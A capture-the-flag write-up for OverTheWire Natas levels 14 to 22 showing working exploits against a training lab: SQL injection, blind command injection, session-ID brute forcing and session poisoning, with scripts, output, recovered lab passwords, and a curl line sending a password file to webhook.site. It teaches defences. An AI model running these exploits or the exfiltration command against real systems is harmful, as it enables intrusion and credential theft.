Executing query: SELECT * from users where username="natas15" and password="secret" or "42"<br>Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Conclusion

This level introduces the concept of SQL injection attacks. The most robust mitigation is to use prepared statements with bound parameters, so that user input is never parsed as part of the SQL statement. It is also a good idea to check that the query returned the expected result instead of just any result, to validate that user input matches the expected format, and to escape special characters if a query string has to be composed by hand. Specific guidance for php is available on the official site.
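
One common way to keep user input out of the query text is a parameterized query. The sketch below uses Python's built-in sqlite3 module with an in-memory database as a stand-in for the level's MySQL table; the table contents and the login helper are made up for illustration.

```python
import sqlite3

# In-memory SQLite database standing in for the level's MySQL table (assumption)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
# Plaintext only to mirror the level; a real system would store a password hash
conn.execute("INSERT INTO users VALUES (?, ?)", ("natas15", "correct-password"))


def login(username: str, password: str) -> bool:
    """Bind user input as parameters so it is never parsed as SQL."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


print(login("natas15", "correct-password"))
print(login("natas15", 'secret" or "42'))
```

The injection string from this level is treated as a literal password here, so it matches nothing.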

Additionally, the following remarks can be made:

It is usually a good idea to disable debugging interfaces in a production environment to avoid information leakage
It is never a good idea to store passwords in plaintext

Level 15

More SQL stuff:

<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

This is similar to the previous level, but this time there's no obvious way to make the level read out a password. The comment in the source reveals the structure of the users table: two columns, username and password, each with a maximum size of 64 characters.

Presumably, user natas16 exists:

$ curl -s -X POST http://natas15.natas.labs.overthewire.org?debug \
> -u natas15:$PW \
> -F "username=natas16" | grep exists
Executing query: SELECT * from users where username="natas16"<br>This user exists.<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Since the SQL query can be manipulated, it should be possible to test characters in the user's password with queries like the following:

SELECT * from users where username="natas16" and password like "%a%";

The below query confirms the character 'a' exists in the password:

$ curl -s -X POST http://natas15.natas.labs.overthewire.org?debug \
> -u natas15:$PW \
> -F "username=natas16\" and password like \"%a%" | grep natas16
Executing query: SELECT * from users where username="natas16" and password like "%a%"<br>This user exists.<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

It would be very tedious to test this manually. The following Python program automates testing each candidate character, using the Content-Length header to determine whether the "This user exists." response was returned. For more advanced brute-force attacks it is probably a good idea to implement some form of concurrency, but this should do:

natas15_probe.py

import requests
import string


def get_query_string_params(char: str) -> dict:
    query = f'natas16" and password like "%{char}%'
    return {"username": query}


def check_character(char: str, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char)
    with session.post(url, data=params) as response:
        return response.headers["Content-Length"] == "394"  # user exists


if __name__ == "__main__":

    url = "http://natas15.natas.labs.overthewire.org"
    # assume password is alphanumeric
    chars = string.ascii_lowercase + string.digits
    session = requests.Session()
    session.auth = ("natas15", "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J")

    matches = ""

    for c in chars:
        if check_character(c, session, url):
            matches += c
        print(f"Matched: {matches}", end="\r")
    print(f"Matches: {matches}")

Running the program provides a list of valid characters:

$ python3 natas15_probe.py
Matches: abcehijmnopqrtw03569

It should be noted that this matching is case-insensitive because LIKE ignores case under the default collation. It also does not account for repeated characters or position. Both can be addressed using the LEFT function and the BINARY operator, producing a query like this:

SELECT * from users where username="natas16" and binary left(password, 3) = "abc";

Finally, an assumption is made that the password is 32 characters based on previous levels. Here's the updated code:

natas15.py

import requests


def get_query_string_params(char: str, index: int) -> dict:
    query = f'natas16" and binary left(password, {index}) = "{char}'
    return {"username": query}


def check_character(char: str, index: int, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char, index)
    with session.post(url, data=params) as response:
        return response.headers["Content-Length"] == "394"  # user exists


if __name__ == "__main__":

    url = "http://natas15.natas.labs.overthewire.org"
    chars = "abcehijmnopqrtw03569"
    chars += "".join(c for c in chars.upper() if c.isalpha())
    session = requests.Session()
    session.auth = ("natas15", "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J")

    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            if check_character(matches + c, len(matches) + 1, session, url):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

Running the program produces the password after some time:

$ python3 natas15.py
Password: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
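The extraction loop can be exercised without touching the server by swapping the HTTP request for a local oracle. The sketch below assumes a made-up secret; make_oracle and extract are hypothetical names, and the oracle only stands in for the binary left(password, n) = "..." check. Unlike the script above, it leaves the inner loop as soon as a character matches and stops when nothing fits.

```python
import string
from typing import Callable


def make_oracle(secret: str) -> Callable[[str], bool]:
    """Stand-in for the server: True when the guess is a case-sensitive prefix."""
    def oracle(prefix: str) -> bool:
        return secret[: len(prefix)] == prefix
    return oracle


def extract(oracle: Callable[[str], bool], alphabet: str, max_len: int = 32) -> str:
    """Grow the known prefix one character at a time."""
    known = ""
    while len(known) < max_len:
        for c in alphabet:
            if oracle(known + c):
                known += c
                break
        else:
            break  # no candidate matched: the secret is shorter than max_len
    return known


alphabet = string.ascii_letters + string.digits
print(extract(make_oracle("S3cr3t"), alphabet))
```

The early exit avoids an endless loop when the password is shorter than assumed or contains a character outside the alphabet.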

Conclusion

The same commentary about avoiding SQL injection applies here. Implementing rate limits, for example based on IP address or range, can greatly reduce the practicality of a brute force attack.
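As a rough idea of what such a rate limit could look like, here is a minimal sliding-window sketch. The RateLimiter class, its parameters and the injectable clock are all assumptions made for illustration; a real deployment would more likely rely on the web server or a reverse proxy.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class RateLimiter:
    """Allow at most `limit` requests per `window` seconds for each client key."""

    def __init__(self, limit: int, window: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.limit = limit
        self.window = window
        self.clock = clock
        self.hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, client: str) -> bool:
        now = self.clock()
        recent = self.hits[client]
        # Drop timestamps that have fallen out of the window.
        while recent and now - recent[0] >= self.window:
            recent.popleft()
        if len(recent) >= self.limit:
            return False
        recent.append(now)
        return True
```

With a limit of, say, 10 requests per minute, the up to 62 × 32 = 1984 requests needed to test a full alphanumeric alphabet against a 32-character password would take more than three hours.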

Level 16

Throwback to Level 10 with additional characters filtered out:

<?
// snip
if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>

The characters $, ( and ) are missing from the filter, which means that command injection through $(...) is still possible. Because the injected command's output becomes part of the grep pattern, it is never displayed directly. This is usually called a "blind" attack. One way to determine whether a command was injected successfully without access to its output is to try commands that take a different amount of time to execute. sleep can be very useful:

$ /usr/bin/time -f %e \
> curl http://natas16.natas.labs.overthewire.org \
> -u natas16:$PW -s -o /dev/null \
> -G -d "needle=derp"
0.63
$ /usr/bin/time -f %e \
> curl http://natas16.natas.labs.overthewire.org \
> -u natas16:$PW -s -o /dev/null \
> -G --data-urlencode "needle=\$(sleep 5)"
5.31

It is obviously possible to execute commands. With this in mind, it should be possible to construct a grep command that looks like the following, appending the password to dictionary.txt and catching any word of length 15 or more:

$ grep -i "$(cat /etc/natas_webpass/natas17 >> dictionary.txt)..............." dictionary.txt

In testing this, I did not have much (read: any) success. It may be that the file is write protected and the standard error output is redirected elsewhere. Back to the drawing board.

The next idea I had was to read out the password and send it to another machine, for example using something like the following:

$ grep -i "$(curl http://webhook.site/7641a4a5-fe2c-4976-958b-4febed0aaa25?q=$(cat /etc/natas_webpass/natas17))" dictionary.txt

This should result in reading out the password and sending it to the target URL. Again, I was unable to get this working. It may be that the user is unable to access the curl command or that outbound connections are prevented. Using the which command as input, it is possible to determine that curl is present. In any case, either of the above would have been my preferred options of solving this challenge.

So what's left? Well, one option is to use a nested grep command to test patterns against /etc/natas_webpass/natas17 by brute force. If the inner command finds a match it prints the matching line, otherwise it produces no output. Appending a known word from the dictionary to that output makes it possible to tell success from failure by looking at the page. The ^ anchor ties the pattern to the start of the line, which comes in handy when building out the password one character at a time (-E switches grep to extended regular expressions). For example:

$(grep -E ^. /etc/natas_webpass/natas17)Eskimo # match -> returns nothing
$(grep -E ^P /etc/natas_webpass/natas17)Eskimo # no match -> returns results for Eskimo
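The sentinel logic is easy to get backwards, so here is an offline sketch that emulates both grep calls in Python. The function names, the tiny dictionary and the secret are made up; the outer grep is simplified to a literal, case-insensitive substring search, which is equivalent for purely alphanumeric needles.

```python
import re
from typing import List


def inner_grep(pattern: str, secret_line: str) -> str:
    """Emulate $(grep -E ^pattern file): the whole line on a match, else nothing."""
    return secret_line if re.search("^" + pattern, secret_line) else ""


def outer_grep(needle: str, dictionary: List[str]) -> List[str]:
    """Emulate grep -i needle dictionary.txt with a literal needle."""
    return [word for word in dictionary if needle.lower() in word.lower()]


def guess_is_correct(pattern: str, secret_line: str, dictionary: List[str],
                     sentinel: str = "Eskimo") -> bool:
    """The guess is right exactly when the sentinel disappears from the output."""
    needle = inner_grep(pattern, secret_line) + sentinel
    return sentinel not in outer_grep(needle, dictionary)
```

A correct guess turns the needle into the full password followed by Eskimo, which no dictionary word contains, so an empty result signals success.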

A simple Python program can be constructed to help brute force the password this way:

natas16.py

import string
import requests


def get_query_params(pattern: str, sentinel: str) -> dict:
    needle = f"$(grep -E ^{pattern} /etc/natas_webpass/natas17){sentinel}"
    return {"needle": needle}


def try_pattern(
    params: dict, session: requests.Session, url: str, sentinel: str
) -> bool:
    with session.get(url, params=params) as response:
        return sentinel not in response.text


if __name__ == "__main__":

    url = "http://natas16.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas16", "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh")
    chars = string.ascii_letters + string.digits
    sentinel = "Eskimo"

    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            pattern = matches + c
            if try_pattern(get_query_params(pattern, sentinel), session, url, sentinel):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

Running the program produces the password after some time:

$ python3 natas16.py
Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Conclusion

The lesson here is that information can be gained by the different behavior exhibited by the site on command success or failure. The other takeaway is that character filters are often incomplete. Like the previous level, rate limits would go a long way in making the attack less practical, especially with an exponentially increasing reset.

Level 17

This one is an iteration on Level 15 without any output:

<?
//snip
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
        } else {
        //echo "This user doesn't exist.<br>";
        }
    } else {
        //echo "Error in query.<br>";
    }
//snip
?>

With no output, this is a completely blind attack. The same baseline SQL query from Level 15 can be applied, but using sleep within an if statement:

SELECT * from users where username="natas18" and if(binary left(password, 3) = "abc", sleep(5), 1) --

With the above statement, the server should wait for 5 seconds if the password matches the input. Given this, the same type of brute force attack used for the previous levels can be re-used here, with the response time serving as the indicator of success or failure. Since there are far fewer successful requests than failures, it makes sense to place the sleep call in the value_if_true position so that only correct guesses are slow, given the if function syntax:

IF(condition, value_if_true, value_if_false)

Time for Python:

natas17.py

import requests
import string


def get_query_string_params(char: str, index: int) -> dict:
    query = (
        f'natas18" and if(binary left(password, {index}) = "{char}", sleep(5), 1) -- '
    )
    return {"username": query}


def check_character(char: str, index: int, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char, index)
    with session.post(url, data=params) as response:
        return response.elapsed.total_seconds() > 5  # success


if __name__ == "__main__":

    url = "http://natas17.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas17", "8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw")
    chars = string.ascii_letters + string.digits
    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            if check_character(matches + c, len(matches) + 1, session, url):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

... and get the password:

$ python3 natas17.py
Password: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
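The timing decision can also be tried offline. The sketch below replaces the server with a local function that pauses only on a correct prefix, using a short delay and a made-up secret so it finishes quickly. make_slow_oracle, is_match and extract_by_timing are hypothetical names; the threshold sits below the delay to leave some margin for jitter.

```python
import time
from typing import Callable


def make_slow_oracle(secret: str, delay: float) -> Callable[[str], None]:
    """Stand-in for the server: pause only when the guess is a correct prefix."""
    def oracle(prefix: str) -> None:
        if secret[: len(prefix)] == prefix:
            time.sleep(delay)
    return oracle


def is_match(oracle: Callable[[str], None], prefix: str, threshold: float) -> bool:
    """Decide from elapsed wall-clock time alone."""
    start = time.perf_counter()
    oracle(prefix)
    return time.perf_counter() - start > threshold


def extract_by_timing(oracle: Callable[[str], None], alphabet: str,
                      max_len: int, threshold: float) -> str:
    """Grow the known prefix, treating every slow response as a hit."""
    known = ""
    while len(known) < max_len:
        for c in alphabet:
            if is_match(oracle, known + c, threshold):
                known += c
                break
        else:
            break  # nothing was slow: stop instead of looping forever
    return known
```

Against a real network the gap between fast and slow responses is noisier, so a larger delay or repeated measurements per guess may be needed.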

Conclusion

Same takeaway as the previous level: information can be gained by means other than direct output. If query parameterization is not used for some reason, it is a good idea to filter out undesirable SQL statements.
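For comparison, here is a minimal sketch of query parameterization. It uses Python's built-in sqlite3 module rather than PHP and MySQL, single quotes instead of the level's double quotes, and a made-up row, so it only illustrates the principle.

```python
import sqlite3


def user_exists_unsafe(conn: sqlite3.Connection, username: str) -> bool:
    """Vulnerable: the input is pasted into the SQL text, as in the level."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn: sqlite3.Connection, username: str) -> bool:
    """Parameterized: the driver passes the input as data, never as SQL."""
    query = "SELECT * FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchone() is not None


# In-memory database with a single made-up user.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", ("natas16", "made-up-secret"))

payload = "natas16' AND password LIKE '%a%"
print(user_exists_unsafe(conn, payload), user_exists_safe(conn, payload))
```

With the placeholder, the whole payload is compared against the username column as one literal string, so it no longer leaks anything about the password.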

Level 18

Time for something slightly different? The following code is provided, having removed noisy comment blocks and edited various sections to simplify the representation:

<?

$maxid = 640; // 640 should be enough for everyone

function createID($user) {
    global $maxid;
    return rand(1, $maxid);
}

function debug($msg) {
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}

function my_session_start() {
    if(array_key_exists("PHPSESSID", $_COOKIE) and is_numeric($_COOKIE["PHPSESSID"])) {
        if(!session_start()) {
            debug("Session start failed");
            return false;
        } else {
            debug("Session start ok");
            if(!array_key_exists("admin", $_SESSION)) {
                debug("Session was old: admin flag set");
                $_SESSION["admin"] = 0; // backwards compatible, secure
            }
            return true;
        }
    }
    return false;
}

function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas19\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
        session_id(createID($_REQUEST["username"]));
        session_start();
        $_SESSION["admin"] = 0;
        debug("New session started");
        $showform = false;
        print_credentials();
    }
} 

if($showform) {
?>
<p>
Please login with your admin account to retrieve credentials for natas19.
</p>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<? } ?>

First, my_session_start() is called, which checks if there is an existing session. This is done by way of checking for a cookie named PHPSESSID. If there is no existing session this function does nothing. If session_start() is able to load an existing session through the PHPSESSID cookie there is a check if the admin key is present. If not, it is set to 0.

When no session is present, a new one is created and its identifier is set with session_id(). The identifier comes from createID(), which returns a random integer between 1 and 640. It should be possible to simply find an existing session that belongs to "admin" within that range.

Here's an example of a new session being created and then used:

$ curl -s -X POST http://natas18.natas.labs.overthewire.org?debug \
> -u natas18:$PW \
> -F "username=foo" -F "password=bar" \
> -c - |
> grep -i "debug\|phpsessid"
DEBUG: New session started<br>You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
#HttpOnly_natas18.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       310
$ curl -s http://natas18.natas.labs.overthewire.org?debug \
> -u natas18:$PW \
> -b "PHPSESSID=310" |
> grep -i "debug"
DEBUG: Session start ok<br>You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

And a few lines of bash:

$ for i in {1..640}
> do
> curl -s http://natas18.natas.labs.overthewire.org \
> -u natas18:$PW \
> -b "PHPSESSID=$i" | grep "Password"
> if [ "$?" == "0" ]; then
> break
> fi
> done | grep "Password"
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs</pre><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

grep is used twice here to exit the loop once the password is found, then only capture the relevant output of the command.
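The same search can be written in Python with the HTTP call passed in as a function, which makes the loop testable without a network. find_admin_session and fake_fetch are hypothetical names, and the session ID that fake_fetch treats as admin is arbitrary.

```python
from typing import Callable, Optional


def find_admin_session(fetch: Callable[[str], str], max_id: int = 640,
                       marker: str = "You are an admin") -> Optional[int]:
    """Try every session ID in order and return the first one showing the marker."""
    for session_id in range(1, max_id + 1):
        if marker in fetch(str(session_id)):
            return session_id
    return None


def fake_fetch(session_id: str) -> str:
    """Stand-in for the HTTP request; pretends that ID 119 belongs to the admin."""
    if session_id == "119":
        return "You are an admin. The credentials for the next level are:"
    return "You are logged in as a regular user."


print(find_admin_session(fake_fetch))
```

With requests, fetch could be something like lambda sid: session.get(url, cookies={"PHPSESSID": sid}).text, assuming session and url are set up as in the earlier scripts.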

Conclusion

As stated in Level 5, using cookies to manage sessions and states is not necessarily always a bad idea, but values need to be randomly generated using a sufficient amount of entropy.
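As a point of comparison, a sufficiently random identifier takes one line with Python's secrets module. This is a sketch of the idea rather than a drop-in replacement for PHP's session handling; new_session_id is a hypothetical helper.

```python
import secrets


def new_session_id(num_bytes: int = 16) -> str:
    """Return an unpredictable hex session ID with num_bytes * 8 bits of entropy."""
    return secrets.token_hex(num_bytes)


print(new_session_id())
```

Sixteen random bytes give 2^128 possible identifiers instead of 640, which puts enumeration out of reach.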

Level 19

This level presents the following message:

This page uses mostly the same code as the previous level, but session IDs are no longer sequential...

Seems like a reasonable idea to check the session identifier format:

$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=foo" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3137332d666f6f
...
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3530382d666f6f
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3334332d666f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=foo" -F "password=baz" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3237312d666f6f
...
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3538382d666f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=moo" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3434382d6d6f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=AAAAAAAA" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3333332d4141414141414141

The trailing portion of the session identifier appears to be correlated with the username. The last one is an immediate giveaway that these are hex-encoded ASCII characters:

$ echo "3333332d4141414141414141" | xxd -p -r
333-AAAAAAAA # [session-id]-[username]
$ echo -n "admin" | xxd -p
61646d696e
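The same conversion can be done in Python, which is convenient when generating candidate cookies in a script. The two helper names below are made up for this sketch.

```python
def decode_session_id(hex_id: str) -> str:
    """Turn the hex cookie value back into readable text."""
    return bytes.fromhex(hex_id).decode("ascii")


def encode_session_id(number: int, username: str) -> str:
    """Build a cookie value in the observed [number]-[username] format."""
    return f"{number}-{username}".encode("ascii").hex()


print(decode_session_id("3333332d4141414141414141"))
print(encode_session_id(1, "admin"))
```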

Assuming that there is still a maximum of 640 sessions (this time per username), let's update our previous script:

$ for i in {1..640}
> do
> PHPSESSID=$(echo -n "${i}-admin" | xxd -p)
> curl -s http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -b "PHPSESSID=$PHPSESSID" |
> grep -e "Password"
> if [ "$?" == "0" ]; then
> break
> fi
> done |
> grep "Password" # hit enter and go grab a coffee
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre></div>

Conclusion

Not much to add in terms of commentary compared to the previous level. Outside of what has already been mentioned about randomness of cookies, this attack could be a lot more difficult with some restrictions specifically designed to deter brute force attacks, such as rate limits or exponential delays on failure.

Level 20

Level 20 presents the following code, subjected to a bit of cleanup and removal of unimportant items:

<?
function debug($msg) {
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}

function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas21\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}

function myread($sid) { 
    debug("MYREAD $sid"); 
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
        debug("Invalid SID");
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
        $parts = explode(" ", $line, 2);
        if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode();
}

function mywrite($sid, $data) {
    // $data contains the serialized version of $_SESSION
    // but our encoding is better
    debug("MYWRITE $sid $data");
    // make sure the sid is alnum only!!
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
        debug("Invalid SID");
        return;
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    $data = "";
    debug("Saving in ". $filename);
    ksort($_SESSION);
    foreach($_SESSION as $key => $value) {
        debug("$key => $value");
        $data .= "$key $value\n";
    }
    file_put_contents($filename, $data);
    chmod($filename, 0600);
}

session_set_save_handler(
    "myopen", 
    "myclose", 
    "myread", 
    "mywrite", 
    "mydestroy", 
    "mygarbage");
session_start();

if(array_key_exists("name", $_REQUEST)) {
    $_SESSION["name"] = $_REQUEST["name"];
    debug("Name set to " . $_REQUEST["name"]);
}

print_credentials();

$name = "";
if(array_key_exists("name", $_SESSION)) {
    $name = $_SESSION["name"];
}
?>

This is an iteration of previous levels, where session_set_save_handler() is used to save and load session data. Out of the required functions, only the read and write callables are implemented with anything interesting.

The mywrite function builds a string with one "key value" line for each entry in the session data and writes it to a file named after the session identifier. The myread function reads the same file and parses it back into key:value pairs, splitting the data into lines on the newline character and then splitting each line into key and value at the first space:

foreach(explode("\n", $data) as $line) {
    debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
}

It should be possible to make this function read out two separate key:value pairs by injecting a well placed newline character in the name field: "name=user%0Aadmin%201" (%0A is URL-encoded newline). There is also an option to set an easy-to-remember cookie instead of the random value generated by the server:

$ curl -s -X POST http://natas20.natas.labs.overthewire.org \
> -u natas20:$PW \
> -d "name=user%0Aadmin%201" \
> -b "PHPSESSID=c00k13" > /dev/null
$ curl -s http://natas20.natas.labs.overthewire.org \
> -u natas20:$PW \
> -b "PHPSESSID=c00k13" |
> grep "Password:"
Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ</pre>

Conclusion

Clearly, the "better" encoding is not particularly good. Any session state related to access control must be maintained in a way that is entirely managed server side.
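The round trip through the custom format can be reproduced in a few lines of Python to show exactly where the extra key appears. my_write and my_read are simplified re-implementations written for this sketch, not the level's code.

```python
from typing import Dict


def my_write(session: Dict[str, str]) -> str:
    """Serialize like mywrite: one "key value" line per entry, keys sorted."""
    return "".join(f"{key} {session[key]}\n" for key in sorted(session))


def my_read(data: str) -> Dict[str, str]:
    """Parse like myread: split on newlines, then on the first space."""
    session: Dict[str, str] = {}
    for line in data.split("\n"):
        key, _, value = line.partition(" ")
        if key != "":
            session[key] = value
    return session


stored = my_write({"name": "user\nadmin 1"})
print(my_read(stored))
```

The writer never escapes the newline inside the value, so the reader has no way to tell the injected line from a genuine entry.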

Level 21

At first glance, this one looks similar to Level 20:

<?
function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas22\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}

session_start();
print_credentials();

?>

The body contains a note and link to another page:

<p>
<b>Note: this website is colocated with
    <a href="http://natas21-experimenter.natas.labs.overthewire.org">
    http://natas21-experimenter.natas.labs.overthewire.org</a></b>
</p>

It seems likely that the vulnerability would be located on that site. The site accepts the natas21 credentials and presents a form to manipulate the style of a basic HTML div element. The following source code is provided:

<?
session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
        $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
        $val = $_SESSION[$key];
    } else {
        $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?>

Given the foreach loop that copies every request parameter into $_SESSION when submit is present, it should be possible to create arbitrary key:value pairs in the session. Since the sites are co-hosted, session identifiers may be shared between the two. Only one way to find out:

$ curl -s -X POST http://natas21-experimenter.natas.labs.overthewire.org/index.php?debug \
> -u natas21:$PW \
> -d "submit=orly" -d "admin=1" -d "bgcolor=green" \
> -b "PHPSESSID=omnomnom" | grep -A6 "DEBUG"
[DEBUG] Session contents:<br>Array
(
    [debug] =>
    [submit] => orly
    [admin] => 1
    [bgcolor] => green
)
$ # reuse session with the other site
$ curl -s http://natas21.natas.labs.overthewire.org \
> -u natas21:$PW \
> -b "PHPSESSID=omnomnom" |
> grep "Password:"
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ</pre>

Conclusion

This level presented a new concept, where a session state can be created in one location (page) and re-used in another. This is something developers need to consider carefully when allowing users to manipulate session states: after all, there are valid use cases for this (at least within an application with multiple pages). If sessions are not intended to be re-used between applications, they should not be able to access each other's files. This can be achieved by using separate accounts, encrypting the session files with separate keys or (in the age of disposable compute) just running them on different servers.
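Independently of how session storage is separated, the experimenter page could restrict which keys it copies. The sketch below contrasts the two behaviours using plain dictionaries in place of $_REQUEST and $_SESSION; the function names are made up.

```python
from typing import Dict

VALID_KEYS = ("align", "fontsize", "bgcolor")


def update_unfiltered(session: Dict[str, str], request: Dict[str, str]) -> None:
    """What the experimenter page does: copy every request parameter."""
    if "submit" in request:
        session.update(request)


def update_filtered(session: Dict[str, str], request: Dict[str, str]) -> None:
    """Possible fix: copy only the keys the form is meant to control."""
    if "submit" in request:
        for key in VALID_KEYS:
            if key in request:
                session[key] = request[key]
```

The source already defines the list of valid keys, but only uses it when rendering the form, not when storing the submitted values.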

Level 22

This level includes a Harry Potter reference:

<?
session_start();

